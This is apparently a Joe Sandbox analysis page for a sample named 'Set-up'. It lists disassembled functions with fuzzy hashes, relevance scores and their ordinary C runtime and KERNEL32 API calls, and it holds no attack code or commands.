Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 5765919894b30d5b86ac3d29871ac6afc4c7dab84d3569b456cd77ba54153e89
Instruction ID: 00080c7a7e7a734098c83dae419a95c59a588899b05dafcbc81c2ba3cd2e2906
Opcode Fuzzy Hash: 5765919894b30d5b86ac3d29871ac6afc4c7dab84d3569b456cd77ba54153e89
Instruction Fuzzy Hash: 3D217472D00299EFDF009FE4CC819EE7BB4FB0D324B140626E520A7181EB3D9815DBA5

Function 6BB53BB0 Relevance: 12.2, APIs: 8, Instructions: 214stringCOMMON

Download Yara Rule

APIs

strncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB53C42
_ismbblead.MSVCR100(00000001), ref: 6BB53C61
strncpy_s.MSVCR100(?,?,?,?), ref: 6BB53CB5
strncpy_s.MSVCR100(?,?,?,?), ref: 6BB53CEA
_errno.MSVCR100 ref: 6BB70F5B
_invalid_parameter_noinfo.MSVCR100 ref: 6BB70F6A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
String ID:
API String ID: 519590025-0
Opcode ID: 4e00a091103d941e1c40a338997678d01b7d0434557b1924abd6fe849d78b28f
Instruction ID: 7b6de416a595888e6cb63f6ca14f6d8ed6e245cfd4dfb38586ffa397501624d2
Opcode Fuzzy Hash: 4e00a091103d941e1c40a338997678d01b7d0434557b1924abd6fe849d78b28f
Instruction Fuzzy Hash: 6371CD32844AC8DFCF329F18C8506DE3BA1EB45744F6401A7F8B95A244D37EC5A1C792

Function 6BB48E3C Relevance: 12.2, APIs: 8, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95aef42f6c54091fcc9da20cbeeb6bb93a383edaf274cf1a46da4b921226ca7e
Instruction ID: 7830b50c089be8fba6395eeb7d02d008ce6f1c454fa2fa6d4f572bbab0fed29e
Opcode Fuzzy Hash: 95aef42f6c54091fcc9da20cbeeb6bb93a383edaf274cf1a46da4b921226ca7e
Instruction Fuzzy Hash: 1C717671D002AADFDF10DFA4CD908BEBBB5FB05358B1005A9E121A7294E7399D80DFA1

Function 6BB9FDBB Relevance: 12.2, APIs: 8, Instructions: 173COMMON

Download Yara Rule

APIs

_errno.MSVCR100(?,?,?,00000000,00000001,6BBE6CD0), ref: 6BB9FDD5
_invalid_parameter_noinfo.MSVCR100(?,?,?,00000000,00000001,6BBE6CD0), ref: 6BB9FDE0

Part of subcall function 6BBBAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BB8B84F,?,6BB8C3D3,00000003,6BB674A4,6BB4AA18,0000000C,6BB674F7,00000001,00000001), ref: 6BBBAEB5

_errno.MSVCR100(00000000,?,?,?,00000000,00000001,6BBE6CD0), ref: 6BB9FE01
_invalid_parameter_noinfo.MSVCR100(00000000,?,?,?,00000000,00000001,6BBE6CD0), ref: 6BB9FE0C
__stricmp_l.LIBCMT(00000001,00000000,?,00000000,?,?,?,00000000,00000001,6BBE6CD0), ref: 6BB9FE36

Part of subcall function 6BBB0E0D: _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBB0E28
Part of subcall function 6BBB0E0D: _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBB0E33

__crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BBE6CD0,00000002,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6BB9FE8C
__crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BBE6CD0,00000002,?,00000001,?,?,?,?,?,?,?), ref: 6BB9FF0D
_errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?,00000000,00000001,6BBE6CD0), ref: 6BB9FF6A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo$String__crt$__stricmp_l_invalid_parameter
String ID:
API String ID: 2295373847-0
Opcode ID: 603d863ab6191c6e4dbf1b298263febe787c94863279d14a6e9d934dd312b481
Instruction ID: cb1f730c476fc0c34ba720a656feb13b6f13b31b69fb549c556b037eb23ee14f
Opcode Fuzzy Hash: 603d863ab6191c6e4dbf1b298263febe787c94863279d14a6e9d934dd312b481
Instruction Fuzzy Hash: 97510470D142D9ABDB15AB68D481BBD7BB0EB03738F2441E9F0B15B1D2D738AA41CB50

Function 6BB44286 Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_errno.MSVCR100(?,?,6BB442B4,?), ref: 6BB6875A
_invalid_parameter_noinfo.MSVCR100(?,?,6BB442B4,?), ref: 6BB68765

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: cf0edadcb67d473c08433c4b94b96e7b5237586fdb17c222881a2f8c7a4a75e9
Instruction ID: 889089d29258440055d427ea9075f9d323f76f4fa26a6ea4b6cba0b53467fc2f
Opcode Fuzzy Hash: cf0edadcb67d473c08433c4b94b96e7b5237586fdb17c222881a2f8c7a4a75e9
Instruction Fuzzy Hash: 5F31C672420B818ED7214F39C841B6A77A4FF037A4B10896ED4B59A1A4FB2CE955DF81

Function 6BB4CE44 Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,?,?,?,6BB53379,?), ref: 6BB4CE8D
_read.MSVCR100(00000000,?,?,?,?,6BB53379,?), ref: 6BB4CE94
_fileno.MSVCR100(?), ref: 6BB4CEB7
_fileno.MSVCR100(?), ref: 6BB4CEC7
_fileno.MSVCR100(?), ref: 6BB4CED8
_fileno.MSVCR100(?,?), ref: 6BB4CEE8
_errno.MSVCR100(?,?,6BB53379,?), ref: 6BB6870C
_invalid_parameter_noinfo.MSVCR100(?,?,6BB53379,?), ref: 6BB68717

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _fileno$_errno_invalid_parameter_noinfo_read
String ID:
API String ID: 2022966298-0
Opcode ID: bfbfc8a7057afd4f2ce55275ff37215d21dc7d51b3380e100bf6a186f8f2b45d
Instruction ID: d3f5f03264b68e155a8b138660206006759272ca163c96980ae55caa36297d7e
Opcode Fuzzy Hash: bfbfc8a7057afd4f2ce55275ff37215d21dc7d51b3380e100bf6a186f8f2b45d
Instruction Fuzzy Hash: 52310632444FC08AD3310F35C84166A77F4FF03BA8B108A59D4B68A2A4DB3DE55A9F56

Function 6BB4FA37 Relevance: 12.1, APIs: 8, Instructions: 99COMMON

Download Yara Rule

APIs

__crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6BB55F76
_errno.MSVCR100 ref: 6BB6C752
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6C75D
_errno.MSVCR100 ref: 6BB6C76C
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6C777
_errno.MSVCR100 ref: 6BB6C786
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6C791

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$CompareString__crt
String ID:
API String ID: 380063240-0
Opcode ID: b211c554b537cf239ba6c6cd4712025158d797d520ee2420003e00b4f6839abd
Instruction ID: 4e485ea8676e2eb80a7dffcfbdb31a719d2c2184952f143cff76bc35ed9edcc0
Opcode Fuzzy Hash: b211c554b537cf239ba6c6cd4712025158d797d520ee2420003e00b4f6839abd
Instruction Fuzzy Hash: DB31E471A006D59BDB105E79C84077E36B6FB01764F500291E4748B2D8EB3CCC44E6A2

Function 6BB44B95 Relevance: 12.1, APIs: 8, Instructions: 97stringCOMMON

Download Yara Rule

APIs

_getptd.MSVCR100(?,?,?,?,?,?,?,6BB44CC0,00000014), ref: 6BB44BAF

Part of subcall function 6BB44E90: _getptd.MSVCR100(6BB44EF0,0000000C,6BB69FD5,?,?,6BB49233,?), ref: 6BB44E9C
Part of subcall function 6BB44E90: _lock.MSVCR100(0000000C), ref: 6BB44EB3

_calloc_crt.MSVCR100(000000D8,00000001), ref: 6BB44BCF
_lock.MSVCR100(0000000C), ref: 6BB44BE5

Part of subcall function 6BB40C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40C5E

__copytlocinfo_nolock.LIBCMT ref: 6BB44BF3

Part of subcall function 6BB4497A: _unlock.MSVCR100(0000000C,6BB44C01), ref: 6BB4497C

Part of subcall function 6BB44DDA: __expandlocale.LIBCMT ref: 6BB44E34
Part of subcall function 6BB44DDA: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB44E50

strcmp.MSVCR100(00000000,6BBE39A0), ref: 6BB44C28
_lock.MSVCR100(0000000C), ref: 6BB44C39
_errno.MSVCR100(?,?,?,?,?,?,?,6BB44CC0,00000014), ref: 6BB70C98
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6BB44CC0,00000014), ref: 6BB70CA3

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _lock$_getptdstrcmp$CriticalEnterSection__copytlocinfo_nolock__expandlocale_calloc_crt_errno_invalid_parameter_noinfo_unlock
String ID:
API String ID: 2630553387-0
Opcode ID: a0b78b95a5a2cfe3c3d81c8bf1119c1cfa5e0ee37300a9ba25231ee3a02bd1d6
Instruction ID: 897b940aecb4b063852f7abf49e5810675c1b5bf4d8428be35a874e64d23cf9d
Opcode Fuzzy Hash: a0b78b95a5a2cfe3c3d81c8bf1119c1cfa5e0ee37300a9ba25231ee3a02bd1d6
Instruction Fuzzy Hash: EC31CF71808384EFEB109F74C946B6E77F0BF44318F10806AD409572A5DFBD8650EB25

Function 6BB4B2A9 Relevance: 12.1, APIs: 8, Instructions: 86stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT(00000000,?,?,6BB4B286), ref: 6BB4B2C5
_calloc_crt.MSVCR100(00000001,00000004,?,?,6BB4B286), ref: 6BB4B2D5
_strlen.LIBCMT(00000000,?,?,?,6BB4B286), ref: 6BB4B2FC
_calloc_crt.MSVCR100(00000001,00000001,?,?,?,6BB4B286), ref: 6BB4B30D
strcpy_s.MSVCR100(00000000,00000001,00000000,?,?,?,6BB4B286), ref: 6BB4B321
free.MSVCR100(?,?,?,6BB4B286), ref: 6BB4B33E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _calloc_crt_strlen$freestrcpy_s
String ID:
API String ID: 1972913904-0
Opcode ID: 6965297000fc90435791ec134b358b143040bc2903d63271fba4ce7317642baa
Instruction ID: 455041d26996219087ba3231ea2442893399c2c18f35908a8ee29e7ade1a49ba
Opcode Fuzzy Hash: 6965297000fc90435791ec134b358b143040bc2903d63271fba4ce7317642baa
Instruction Fuzzy Hash: D5212EB38096D15BDB324F399C45B6E3BA4FF437A8F150645EA6063098DF7ED843A250

Function 6BB510E3 Relevance: 12.1, APIs: 8, Instructions: 86COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT(00000000,?,00000000,6BB70869,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51107
_calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6BB70869,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51118
_wcslen.LIBCMT(00000000,?,?,00000000,6BB70869,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB5113C
_calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6BB70869,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB5114E
wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6BB70869,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51162
free.MSVCR100(?,?,00000000,6BB70869,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51180

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _calloc_crt_wcslen$freewcscpy_s
String ID:
API String ID: 968141106-0
Opcode ID: 221557c4724ccdb2c3effe665820061709f392349aa03aa900083dafe69c2b31
Instruction ID: 7a85b66cceb65abc32832130835da03470ee8ff393447e090ec9b55f12d7caaa
Opcode Fuzzy Hash: 221557c4724ccdb2c3effe665820061709f392349aa03aa900083dafe69c2b31
Instruction Fuzzy Hash: C7210B738146A167DB214F769C45B3A33E4EF42774F24019EE830970E4DFBDD8929591

Function 6BB4AA8C Relevance: 12.1, APIs: 8, Instructions: 76COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(6BBE7580,6BB4BD3C,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB4AAA1
DecodePointer.KERNEL32(?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB4AAAE
_msize.MSVCR100(00000000,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB4AACB

Part of subcall function 6BB42231: HeapSize.KERNEL32(00000000,00000000,?,6BB4AAD0,00000000,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC), ref: 6BB4224B

EncodePointer.KERNEL32(?,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB4AAE7
EncodePointer.KERNEL32(-00000004,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB4AAEF
_realloc_crt.MSVCR100(00000000,00000800,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB52BAF
EncodePointer.KERNEL32(00000000,?,?,?,6BB4AA57,?,6BB4AA70,0000000C,6BB4BAA1,?,?,6BB6F2FC,6BBDFC34,?), ref: 6BB52BC5

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
String ID:
API String ID: 765448609-0
Opcode ID: a59c9e4b72e95e2586a6735900941bb4f5b9620cd410152b0bec09952fbe6f78
Instruction ID: 9ed21c33453391bb5ab86f368dbcb1687d73efdd2a1228a775dd3e72aa017433
Opcode Fuzzy Hash: a59c9e4b72e95e2586a6735900941bb4f5b9620cd410152b0bec09952fbe6f78
Instruction Fuzzy Hash: CD110333600255AFEB109F74CC829CD7BEDEB452A0311043AE842E3110EB7AED409B92

Function 6BB42337 Relevance: 12.1, APIs: 8, Instructions: 67COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 6BB4234D
InterlockedDecrement.KERNEL32(?), ref: 6BB423B8
InterlockedDecrement.KERNEL32(?), ref: 6BB423C8
InterlockedDecrement.KERNEL32(?), ref: 6BB4933E
InterlockedDecrement.KERNEL32(?), ref: 6BB49347
InterlockedDecrement.KERNEL32(?), ref: 6BB4934F
InterlockedDecrement.KERNEL32(?), ref: 6BB49357

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: DecrementInterlocked
String ID:
API String ID: 3448037634-0
Opcode ID: 998a523b17996ac879a301060fd64f102e8f2e7a98cfa61682cbcd2e87bdf85b
Instruction ID: 2e896d1ef64f9d58724263a54ca1f1cd26c7c7a55dc42e4e63a02dde325b2099
Opcode Fuzzy Hash: 998a523b17996ac879a301060fd64f102e8f2e7a98cfa61682cbcd2e87bdf85b
Instruction Fuzzy Hash: AB119135B54299AFDB109A6ACD84B4EF7BCFF42784F0445A6E918D7109D738E800BBA0

Function 6BB41F13 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00000001), ref: 6BB41F25
InterlockedIncrement.KERNEL32(?), ref: 6BB41F90
InterlockedIncrement.KERNEL32(?), ref: 6BB41F9E
InterlockedIncrement.KERNEL32(?), ref: 6BB42ABC
InterlockedIncrement.KERNEL32(?), ref: 6BB42AC4
InterlockedIncrement.KERNEL32(?), ref: 6BB42ACC
InterlockedIncrement.KERNEL32(?), ref: 6BB42AD4

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: IncrementInterlocked
String ID:
API String ID: 3508698243-0
Opcode ID: ded1b9b166efe352623d2fd903bd0a9badd927327ee78a56db91af08173c4887
Instruction ID: cce5c56a5658cc051b8e30c46403914a0d1141dfc32196dd14d726d064f0e0b9
Opcode Fuzzy Hash: ded1b9b166efe352623d2fd903bd0a9badd927327ee78a56db91af08173c4887
Instruction Fuzzy Hash: 84115134F482A9ABDB109A79CC84B4EFFACFF05744F084462E918D7109D778E915ABA1

Function 6BB40233 Relevance: 12.1, APIs: 8, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7), ref: 6BB40263
__FF_MSGBANNER.LIBCMT ref: 6BB6F22F
__NMSG_WRITE.LIBCMT ref: 6BB6F236
_callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001), ref: 6BB6F255
_callnewh.MSVCR100(00000001,00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001), ref: 6BB6F278
_errno.MSVCR100(00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9), ref: 6BB6F27E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _callnewh$AllocHeap_errno
String ID:
API String ID: 3215684309-0
Opcode ID: 02f2ece7260c7cae357be42cca4604aa289731cfffb20bca25cdec258ea0c91f
Instruction ID: 43cebdcaf291c01265761cae252a3f7b390836dd75ff7b522de175837180af2a
Opcode Fuzzy Hash: 02f2ece7260c7cae357be42cca4604aa289731cfffb20bca25cdec258ea0c91f
Instruction Fuzzy Hash: E301F53A244BC2ABE6122E75DC42B2E3358FB927A8F400135F4208A1D0EF7DCC419E61

Function 6BBB8664 Relevance: 12.1, APIs: 8, Instructions: 59COMMON

Download Yara Rule

APIs

_errno.MSVCR100(6BBB8740,00000010,6BB68C0C,00000000,?,00000000,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB8678
_errno.MSVCR100(6BBB8740,00000010,6BB68C0C,00000000,?,00000000,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB8697
_invalid_parameter_noinfo.MSVCR100(6BBB8740,00000010,6BB68C0C,00000000,?,00000000,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB86A2
_get_osfhandle.MSVCR100(?,6BBB8740,00000010,6BB68C0C,00000000,?,00000000,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB86DE
FlushFileBuffers.KERNEL32(00000000,6BBB8740,00000010,6BB68C0C,00000000,?,00000000,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB86E5
GetLastError.KERNEL32(?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB86EF
__doserrno.MSVCR100(?,?,?,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB8704
_errno.MSVCR100(6BBB8740,00000010,6BB68C0C,00000000,?,00000000,?,6BB4FEFA,?,6BB4FF18,0000000C), ref: 6BBB870E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
String ID:
API String ID: 3018510309-0
Opcode ID: aa54c20fe0647b2130b5fade9bb9e4e9d9f49d9c3c55ac2f4840b08dc0716940
Instruction ID: ade006e0325c07f246f9e8839ef4c1b36d956e853753187dae2b340fde979402
Opcode Fuzzy Hash: aa54c20fe0647b2130b5fade9bb9e4e9d9f49d9c3c55ac2f4840b08dc0716940
Instruction Fuzzy Hash: 551156319003868FDB11AFB4C986B6D7B70BB02328F554299D4229B2E5DFBDC9418FA1

Function 6BB40698 Relevance: 12.0, APIs: 8, Instructions: 46threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6BB33238,?,6BB407BA,6BBD7F62), ref: 6BB4069C
__set_flsgetvalue.MSVCR100 ref: 6BB406AA

Part of subcall function 6BB4067B: TlsGetValue.KERNEL32(?,6BB406AF), ref: 6BB40684

SetLastError.KERNEL32(00000000), ref: 6BB406BC
_calloc_crt.MSVCR100(00000001,00000214), ref: 6BB675B7
DecodePointer.KERNEL32(00000000), ref: 6BB675D5
_initptd.MSVCR100(00000000,00000000), ref: 6BB675E4
GetCurrentThreadId.KERNEL32 ref: 6BB675EB

Memory Dump Source

